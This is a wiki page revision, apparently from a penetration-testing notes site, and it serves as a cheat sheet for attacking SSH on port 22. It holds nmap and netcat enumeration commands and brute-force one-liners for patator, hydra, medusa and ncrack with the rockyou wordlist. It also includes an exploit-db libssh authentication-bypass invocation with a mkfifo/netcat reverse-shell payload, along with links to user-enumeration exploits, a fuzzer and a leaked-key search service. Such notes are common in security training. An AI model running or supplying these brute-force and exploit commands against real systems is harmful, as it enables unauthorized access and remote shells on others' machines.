Port 22: Difference between revisions

Revision as of 07:03, 23 October 2022

If you have usernames test login with username:username
Vulnerable Versions to user enum: <7.7

Enum SSH
Get version

nmap 10.11.1.1 -p22 -sV

Get banner

nc 10.11.1.1 22

Get login banner

ssh root@10.11.11.1

Get algorythms supporteed

nmap -p22 10.11.1.1 --script ssh2-enum-algos

Check weak keys

nmap-p22 10.2.1.1 --script ssh-hostkey --script-args ssh_hostkey=full

Check auth methods

nmap -p22 10.11.1.1 --script ssh-auth-methods --script-args="ssh.user=admin"

User can ask to execute a command right after authentication before it’s default command or shell is executed

ssh -v user@10.10.1.111 id
...
Password:
debug1: Authentication succeeded (keyboard-interactive).
Authenticated to 10.10.1.111 ([10.10.1.1114]:22).
debug1: channel 0: new [client-session]
debug1: Requesting no-more-sessions@openssh.com
debug1: Entering interactive session.
debug1: pledge: network
debug1: client_input_global_request: rtype hostkeys-00@openssh.com want_reply 0
debug1: Sending command: id
debug1: client_input_channel_req: channel 0 rtype exit-status reply 0
debug1: client_input_channel_req: channel 0 rtype eow@openssh.com reply 0
uid=1000(user) gid=100(users) groups=100(users)
debug1: channel 0: free: client-session, nchannels 1
Transferred: sent 2412, received 2480 bytes, in 0.1 seconds
Bytes per second: sent 43133.4, received 44349.5
debug1: Exit status 0

Check Auth Methods:

ssh -v 10.10.1.111
OpenSSH_8.1p1, OpenSSL 1.1.1d  10 Sep 2019
...
debug1: Authentications that can continue: publickey,password,keyboard-interactive

Force Auth Method:

ssh -v 10.10.1.111 -o PreferredAuthentications=password
...
debug1: Next authentication method: password

BruteForce:

patator ssh_login host=10.11.1.111 port=22 user=root 0=/usr/share/metasploit-framework/data/wordlists/unix_passwords.txt password=FILE0 -x ignore:mesg='Authentication failed.'
hydra -l user -P /usr/share/wordlists/password/rockyou.txt -e s ssh://10.10.1.111
medusa -h 10.10.1.111 -u user -P /usr/share/wordlists/password/rockyou.txt -e s -M ssh
ncrack --user user -P /usr/share/wordlists/password/rockyou.txt ssh://10.10.1.111

LibSSH Before 0.7.6 and 0.8.4 - LibSSH 0.7.6 / 0.8.4 - Unauthorized Access
Id

python /usr/share/exploitdb/exploits/linux/remote/46307.py 10.10.1.111 22 id

Reverse

python /usr/share/exploitdb/exploits/linux/remote/46307.py 10.10.1.111 22 "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.1.111 80 >/tmp/f"

SSH FUZZ
- https://dl.packetstormsecurity.net/fuzzer/sshfuzz.txt

cpan Net::SSH2

./sshfuzz.pl -H 10.10.1.111 -P 22 -u user -p user

use auxiliary/fuzzers/ssh/ssh_version_2

SSH-AUDIT
- https://github.com/arthepsy/ssh-audit

Enum users < 7.7:
- https://www.exploit-db.com/exploits/45233
- https://github.com/CaioCGH/EP4-redes/blob/master/attacker/sshUsernameEnumExploit.py

python ssh_user_enum.py --port 2223 --userList /root/Downloads/users.txt IP 2>/dev/null | grep "is a"

SSH Leaks:
https://shhgit.darkport.co.uk/

SSH bruteforce
https://github.com/kitabisa/ssb

@@ Line 89: / Line 89: @@
 *SSH FUZZ
-*https://dl.packetstormsecurity.net/fuzzer/sshfuzz.txt
+**https://dl.packetstormsecurity.net/fuzzer/sshfuzz.txt
 *cpan Net::SSH2
@@ Line 99: / Line 99: @@
 *SSH-AUDIT
-*https://github.com/arthepsy/ssh-audit
+**https://github.com/arthepsy/ssh-audit
 *Enum users < 7.7:
-*https://www.exploit-db.com/exploits/45233
+**https://www.exploit-db.com/exploits/45233
-*https://github.com/CaioCGH/EP4-redes/blob/master/attacker/sshUsernameEnumExploit.py
+**https://github.com/CaioCGH/EP4-redes/blob/master/attacker/sshUsernameEnumExploit.py
-*python ssh_user_enum.py --port 2223 --userList /root/Downloads/users.txt IP 2>/dev/null | grep "is a"
+<syntaxhighlight lang="shell">
+python ssh_user_enum.py --port 2223 --userList /root/Downloads/users.txt IP 2>/dev/null | grep "is a"
+</syntaxhighlight>
 *SSH Leaks: